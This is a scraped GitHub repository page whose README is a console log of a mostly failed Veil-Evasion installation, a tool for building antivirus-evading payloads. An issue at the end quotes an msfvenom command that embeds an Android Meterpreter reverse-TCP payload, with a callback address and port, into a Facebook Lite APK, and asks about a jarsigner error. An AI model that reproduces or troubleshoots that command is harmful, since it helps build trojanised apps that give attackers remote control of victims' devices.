Git Product home page Git Product logo

nadhmiamri / help Goto Github PK

View Code? Open in Web Editor NEW
1.0 1.0 0.0 0 B

========================================================================== Veil-Evasion (Setup Script) | [Updated]: 2016-09-09 ========================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================== [I] Ubuntu 16 x86_64 detected... [*] Initializing package installation [*] Adding x86 architecture to x86_64 system for Wine W: The repository 'http://ppa.launchpad.net/backbox/four/ubuntu xenial Release' does not have a Release file. W: The repository 'http://ppa.launchpad.net/gwibber-daily/ppa/ubuntu xenial Release' does not have a Release file. W: GPG error: http://kali.mirror.garr.it/mirrors/kali kali-dev InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY ED444FF07D8D0BF6 W: The repository 'http://http.kali.org/kali kali-dev InRelease' is not signed. E: Failed to fetch http://ppa.launchpad.net/backbox/four/ubuntu/dists/xenial/main/binary-amd64/Packages 404 Not Found E: Failed to fetch http://ppa.launchpad.net/gwibber-daily/ppa/ubuntu/dists/xenial/main/binary-amd64/Packages 404 Not Found E: Some index files failed to download. They have been ignored, or old ones used instead. [*] Installing Wine 32-bit and 64-bit binaries E: Unable to locate package wine-stable E: Package 'wine1.6' has no installation candidate E: Package 'wine1.6-i386' has no installation candidate [ERROR] Failed to install Wine... Exit code: 100 [*] ALERT: Existing Veil Wine environment detected at /home/nadhmi/.config/wine/veil Do you want to nuke it? (recommended) [Y/n]: y [*] Deleting existing Veil Wine environment... [*] Creating new Veil Wine environment in: /home/nadhmi/.config/wine/veil [*] Initializing Veil's Wine environment... sudo: wine: command not found [ERROR] Veil Wine environment could not be found! [ERROR] Check for existence of /home/nadhmi/.config/wine/veil/drive_c [*] Installing dependencies Reading package lists... Done Building dependency tree Reading state information... Done E: Unable to locate package wine-stable [ERROR] Failed to install dependencies... Exit code: 100 [*] Installing Capstone dependencies... [*] Installing Capstone (via Source) Cloning into '/home/nadhmi/Veil-Evasion/setup/capstone'... remote: Counting objects: 21285, done. remote: Compressing objects: 100% (12/12), done. /opt/metasploit-framework/Receiving objects: 27% (5947/21285), 8.11 MiB | 558.0remote: Total 21285 (delta 2), reused 0 (delta 0), pack-reused 21273 Receiving objects: 100% (21285/21285), 32.09 MiB | 387.00 KiB/s, done. Resolving deltas: 100% (15157/15157), done. Checking connectivity... done. Note: checking out 'b53a59af53ffbd5dbe8dbcefba41a00cf4fc7469'. You are in 'detached HEAD' state. You can look around, make experimental changes and commit them, and you can discard any commits you make in this state without impacting any branches by performing another checkout. If you want to create a new branch to retain commits you create, you may do so (now or later) by using -b with the checkout command again. Example: git checkout -b <new-branch-name> HEAD is now at b53a59a... update ChangeLog for 3.0 rm -f ./cs.o ./utils.o ./SStream.o ./MCInstrDesc.o ./MCRegisterInfo.o ./arch/ARM/ARMDisassembler.o ./arch/ARM/ARMInstPrinter.o ./arch/ARM/ARMMapping.o ./arch/ARM/ARMModule.o ./arch/AArch64/AArch64BaseInfo.o ./arch/AArch64/AArch64Disassembler.o ./arch/AArch64/AArch64InstPrinter.o ./arch/AArch64/AArch64Mapping.o ./arch/AArch64/AArch64Module.o ./arch/Mips/MipsDisassembler.o ./arch/Mips/MipsInstPrinter.o ./arch/Mips/MipsMapping.o ./arch/Mips/MipsModule.o ./arch/PowerPC/PPCDisassembler.o ./arch/PowerPC/PPCInstPrinter.o ./arch/PowerPC/PPCMapping.o ./arch/PowerPC/PPCModule.o ./arch/Sparc/SparcDisassembler.o ./arch/Sparc/SparcInstPrinter.o ./arch/Sparc/SparcMapping.o ./arch/Sparc/SparcModule.o ./arch/SystemZ/SystemZDisassembler.o ./arch/SystemZ/SystemZInstPrinter.o ./arch/SystemZ/SystemZMapping.o ./arch/SystemZ/SystemZModule.o ./arch/SystemZ/SystemZMCTargetDesc.o ./arch/X86/X86DisassemblerDecoder.o ./arch/X86/X86Disassembler.o ./arch/X86/X86IntelInstPrinter.o ./arch/X86/X86ATTInstPrinter.o ./arch/X86/X86Mapping.o ./arch/X86/X86Module.o ./arch/XCore/XCoreDisassembler.o ./arch/XCore/XCoreInstPrinter.o ./arch/XCore/XCoreMapping.o ./arch/XCore/XCoreModule.o ./MCInst.o rm -f ./libcapstone.* ./capstone.* rm -f ./capstone.pc cd tests && make clean make[1]: Entering directory '/home/nadhmi/Veil-Evasion/setup/capstone/tests' rm -rf ./test.o ./test_detail.o ./test_skipdata.o ./test_iter.o ./test_arm.o ./test_arm64.o ./test_mips.o ./test_ppc.o ./test_sparc.o ./test_systemz.o ./test_x86.o ./test_xcore.o ./test ./test_detail ./test_skipdata ./test_iter ./test_arm ./test_arm64 ./test_mips ./test_ppc ./test_sparc ./test_systemz ./test_x86 ./test_xcore ./*.exe ./*.static ./libcapstone.* ./capstone.* make[1]: Leaving directory '/home/nadhmi/Veil-Evasion/setup/capstone/tests' rm -f ./tests/libcapstone.so cd bindings/python && make clean make[1]: Entering directory '/home/nadhmi/Veil-Evasion/setup/capstone/bindings/python' rm -rf ./build rm -f capstone/*.so make[1]: Leaving directory '/home/nadhmi/Veil-Evasion/setup/capstone/bindings/python' cd bindings/java && make clean make[1]: Entering directory '/home/nadhmi/Veil-Evasion/setup/capstone/bindings/java' rm -rf ./capstone/*.class rm -rf ./*.class ./*.log ./*.jar make[1]: Leaving directory '/home/nadhmi/Veil-Evasion/setup/capstone/bindings/java' cd bindings/ocaml && make clean make[1]: Entering directory '/home/nadhmi/Veil-Evasion/setup/capstone/bindings/ocaml' rm -f *.[oa] *.so *.cm[ixoa] *.cmxa *.mli test test_detail test_x86 test_arm test_arm64 test_mips test_ppc test_sparc test_systemz test_xcore make[1]: Leaving directory '/home/nadhmi/Veil-Evasion/setup/capstone/bindings/ocaml' CC cs.o CC utils.o CC SStream.o CC MCInstrDesc.o CC MCRegisterInfo.o CC arch/ARM/ARMDisassembler.o CC arch/ARM/ARMInstPrinter.o CC arch/ARM/ARMMapping.o CC arch/ARM/ARMModule.o CC arch/AArch64/AArch64BaseInfo.o CC arch/AArch64/AArch64Disassembler.o CC arch/AArch64/AArch64InstPrinter.o CC arch/AArch64/AArch64Mapping.o CC arch/AArch64/AArch64Module.o CC arch/Mips/MipsDisassembler.o CC arch/Mips/MipsInstPrinter.o CC arch/Mips/MipsMapping.o CC arch/Mips/MipsModule.o CC arch/PowerPC/PPCDisassembler.o CC arch/PowerPC/PPCInstPrinter.o CC arch/PowerPC/PPCMapping.o CC arch/PowerPC/PPCModule.o CC arch/Sparc/SparcDisassembler.o CC arch/Sparc/SparcInstPrinter.o CC arch/Sparc/SparcMapping.o CC arch/Sparc/SparcModule.o CC arch/SystemZ/SystemZDisassembler.o CC arch/SystemZ/SystemZInstPrinter.o CC arch/SystemZ/SystemZMapping.o CC arch/SystemZ/SystemZModule.o CC arch/SystemZ/SystemZMCTargetDesc.o CC arch/X86/X86DisassemblerDecoder.o CC arch/X86/X86Disassembler.o CC arch/X86/X86IntelInstPrinter.o CC arch/X86/X86ATTInstPrinter.o CC arch/X86/X86Mapping.o CC arch/X86/X86Module.o CC arch/XCore/XCoreDisassembler.o CC arch/XCore/XCoreInstPrinter.o CC arch/XCore/XCoreMapping.o CC arch/XCore/XCoreModule.o CC MCInst.o LINK libcapstone.so AR libcapstone.a ar: creating ./libcapstone.a GEN capstone.pc cd tests && make make[1]: Entering directory '/home/nadhmi/Veil-Evasion/setup/capstone/tests' CC test.o CC test_detail.o CC test_skipdata.o CC test_iter.o CC test_arm.o CC test_arm64.o CC test_mips.o CC test_ppc.o CC test_sparc.o CC test_systemz.o CC test_x86.o CC test_xcore.o LINK test LINK test.static LINK test_detail LINK test_detail.static LINK test_skipdata LINK test_skipdata.static LINK test_iter LINK test_iter.static LINK test_arm LINK test_arm.static LINK test_arm64 LINK test_arm64.static LINK test_mips LINK test_mips.static LINK test_ppc LINK test_ppc.static LINK test_sparc LINK test_sparc.static LINK test_systemz LINK test_systemz.static LINK test_x86 LINK test_x86.static LINK test_xcore LINK test_xcore.static make[1]: Leaving directory '/home/nadhmi/Veil-Evasion/setup/capstone/tests' install -m0644 ./libcapstone.so ./tests/ mkdir -p /usr/lib install -m0755 ./libcapstone.so /usr/lib cd /usr/lib && \ mv libcapstone.so libcapstone.so.3 && \ ln -s libcapstone.so.3 libcapstone.so install -m0644 ./libcapstone.a /usr/lib mkdir -p /usr/include/capstone install -m0644 include/*.h /usr/include/capstone mkdir -p /usr/lib/pkgconfig install -m0644 ./capstone.pc /usr/lib/pkgconfig/ rm -rf ./build python setup.py build -b ./build install running build running build_py creating build creating build/lib.linux-x86_64-2.7 creating build/lib.linux-x86_64-2.7/capstone copying capstone/ppc.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/mips_const.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/x86.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/sparc.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/xcore.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/systemz.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/__init__.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/mips.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/ppc_const.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/sparc_const.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/xcore_const.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/arm64.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/arm_const.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/sysz_const.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/x86_const.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/arm64_const.py -> ./build/lib.linux-x86_64-2.7/capstone copying capstone/arm.py -> ./build/lib.linux-x86_64-2.7/capstone running install running install_lib copying ./build/lib.linux-x86_64-2.7/capstone/ppc.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/mips_const.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/x86.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/sparc.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/xcore.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/systemz.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/__init__.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/mips.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/ppc_const.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/sparc_const.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/xcore_const.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/arm64.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/arm_const.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/sysz_const.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/x86_const.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/arm64_const.py -> /usr/local/lib/python2.7/dist-packages/capstone copying ./build/lib.linux-x86_64-2.7/capstone/arm.py -> /usr/local/lib/python2.7/dist-packages/capstone byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/ppc.py to ppc.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/mips_const.py to mips_const.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/x86.py to x86.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/sparc.py to sparc.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/xcore.py to xcore.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/systemz.py to systemz.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/__init__.py to __init__.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/mips.py to mips.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/ppc_const.py to ppc_const.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/sparc_const.py to sparc_const.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/xcore_const.py to xcore_const.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/arm64.py to arm64.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/arm_const.py to arm_const.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/sysz_const.py to sysz_const.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/x86_const.py to x86_const.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/arm64_const.py to arm64_const.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/capstone/arm.py to arm.pyc running install_egg_info Removing /usr/local/lib/python2.7/dist-packages/capstone-3.0.egg-info Writing /usr/local/lib/python2.7/dist-packages/capstone-3.0.egg-info [*] Adding Capstone library path to: /etc/ld.so.conf.d/capstone.conf [*] Initializing Python dependencies installation... [*] Installing Python's SymmetricJSONRPC... [*] Installing SymmetricJSONRPC dependency (via PIP)... sudo: pip2: command not found [ERROR] Failed to install SymmetricJSONRPC... Exit code: 1 [*] Initializing (Wine) Python dependencies installation... [*] Preparing (Wine) Python directories... [*] Installing (Wine) Python... [*] Next -> Next -> Next -> Finished! ...Overwrite if prompt. Use default values. sudo: wine: command not found [ERROR] Failed to install (Wine) Python 2.7.5... Exit code: 1 [*] Installing (Wine) Python dependencies... [*] Installing (Wine) Python's pywin32-219.win32-py2.7.exe... [*] Next -> Next -> Next -> Finished! ...Overwrite if prompt. Use default values. sudo: wine: command not found [ERROR] Failed to install pywin32-219.win32-py2.7.exe... Exit code: 1 [*] Installing (Wine) Python's pycrypto-2.6.win32-py2.7.exe... [*] Next -> Next -> Next -> Finished! ...Overwrite if prompt. Use default values. sudo: wine: command not found [ERROR] Failed to install pycrypto-2.6.win32-py2.7.exe... Exit code: 1 [*] Installing Python's PyInstaller [*] Installing Python's PEFile (For PyInstaller) sudo: wine: command not found [*] Installing Python's Futures (For PyInstaller) sudo: wine: command not found [*] Installing Python's setup tools sudo: wine: command not found [*] Initializing (Wine) Ruby dependencies installation... [*] Installing (Wine) Ruby & dependencies [*] Next -> Next -> Next -> Finished! ...Overwrite if prompt. Use default values. sudo: wine: command not found [ERROR] Failed to install (Wine) Ruby.exe... Exit code: 1 [*] Installing (Wine) Ruby OCRA gem... sudo: wine: command not found [ERROR] Failed to install (Wine) Ruby OCRA Gem... Exit code: 1 [*] Extracting (Wine) Ruby dependencies... [*] Initializing Go dependencies installation... Reading package lists... Done Building dependency tree Reading state information... Done The following additional packages will be installed: binutils cpp-5 g++-5 gcc-5 gcc-5-base gcc-6-base libasan2 libatomic1 libcc1-0 libcilkrts5 libgcc-5-dev libgcc1 libgfortran3 libgo7 libgomp1 libitm1 liblsan0 libmpx0 libquadmath0 libstdc++-5-dev libstdc++6 libtsan0 libubsan0 Suggested packages: binutils-doc gcc-5-locales g++-5-multilib gcc-5-doc libstdc++6-5-dbg gcc-5-multilib libgcc1-dbg libgomp1-dbg libitm1-dbg libatomic1-dbg libasan2-dbg liblsan0-dbg libtsan0-dbg libubsan0-dbg libcilkrts5-dbg libmpx0-dbg libquadmath0-dbg gccgo-5-doc libgo7-dbg libstdc++-5-doc The following packages will be upgraded: binutils cpp-5 g++-5 gcc-5 gcc-5-base gcc-6-base gccgo-5 libasan2 libatomic1 libcc1-0 libcilkrts5 libgcc-5-dev libgcc1 libgfortran3 libgo7 libgomp1 libitm1 liblsan0 libmpx0 libquadmath0 libstdc++-5-dev libstdc++6 libtsan0 libubsan0 24 upgraded, 0 newly installed, 0 to remove and 1802 not upgraded. Need to get 53.7 MB of archives. After this operation, 10.0 MB of additional disk space will be used. WARNING: The following packages cannot be authenticated! gcc-6-base libgcc1 libstdc++6 libquadmath0 libgo7 gccgo-5 g++-5 gcc-5 cpp-5 libcc1-0 binutils libgomp1 libitm1 libatomic1 libasan2 liblsan0 libtsan0 libubsan0 libcilkrts5 libmpx0 libstdc++-5-dev libgcc-5-dev libgfortran3 gcc-5-base E: There were unauthenticated packages and -y was used without --allow-unauthenticated update-alternatives: error: no alternatives for go [*] Installing Go x86_64 (via TAR) [ERROR] Bad hash for go153x64.tar.gz! [*] Updating Veil-Framework configuration... [>] Please enter the path of your metasploit installation: /opt/metasploit-framework/ Veil-Framework configuration: [*] OPERATING_SYSTEM = Linux [*] TERMINAL_CLEAR = clear [*] WINEPREFIX = /home/nadhmi/.config/wine/veil/ [*] TEMP_DIR = /tmp/ [*] MSFVENOM_OPTIONS = [*] METASPLOIT_PATH = /opt/metasploit-framework//opt/metasploit-framework/ [*] MSFVENOM_PATH = /usr/bin/ [*] PYINSTALLER_PATH = /opt/veil/PyInstaller-3.2/ [*] VEIL_EVASION_PATH = /home/nadhmi/Veil-Evasion/ [*] PAYLOAD_SOURCE_PATH = /usr/share/veil-output/source/ [*] PAYLOAD_COMPILED_PATH = /usr/share/veil-output/compiled/ [*] GENERATE_HANDLER_SCRIPT = True [*] HANDLER_PATH = /usr/share/veil-output/handlers/ [*] HASH_LIST = /usr/share/veil-output/hashes.txt [*] VEIL_CATAPULT_PATH = /home/nadhmi/Veil-Catapult/ [*] CATAPULT_RESOURCE_PATH = /usr/share/veil-output/catapult/ Configuration File Written To '/etc/veil/settings.py' [*] Ensuring this account (nadhmi) owns veil output directory (/usr/share/veil-output)... [*] Ensuring this account (nadhmi) has correct ownership of /home/nadhmi/.config/wine/veil There was issues installing the following: Failed to install Wine... Exit code: 100 Veil Wine environment could not be found! Check for existence of /home/nadhmi/.config/wine/veil/drive_c Failed to install dependencies... Exit code: 100 Failed to install SymmetricJSONRPC... Exit code: 1 Failed to install (Wine) Python 2.7.5... Exit code: 1 Failed to install pywin32-219.win32-py2.7.exe... Exit code: 1 Failed to install pycrypto-2.6.win32-py2.7.exe... Exit code: 1 Failed to install (Wine) Ruby.exe... Exit code: 1 Failed to install (Wine) Ruby OCRA Gem... Exit code: 1 Bad hash for go153x64.tar.gz! [I] If you have any errors running Veil-Evasion, delete the Veil Wine profile ('rm -rf /home/nadhmi/.config/wine/veil') and re-run: '/home/nadhmi/Veil-Evasion/setup/setup.sh -c' [I] Done! root@nadhmi:/home/nadhmi/Veil-Evasion/setup#

help's People

Stargazers

 avatar

Watchers

 avatar

help's Issues

Msfvenom not be able to bind payload with apk error

So i was not be able bind my payload with a original apk .

I was using this command :-

#msfvenom -x /root/Desktop/FacebookLite_v230.0.0.4.121_apkpure.com.apk -p android/meterpreter/reverse_tcp lhost:192.168.0.100 lport:4444 -o /root/Desktop/fblite.apk

And I got this error :-

Using APK template: /root/Desktop/FacebookLite_v230.0.0.4.121_apkpure.com.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: jarsigner not found. If it's not in your PATH, please add it.

What is this error ๐Ÿ˜ถ.

__Please explain me how to solve it please respected sir/mam ๐Ÿ™

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.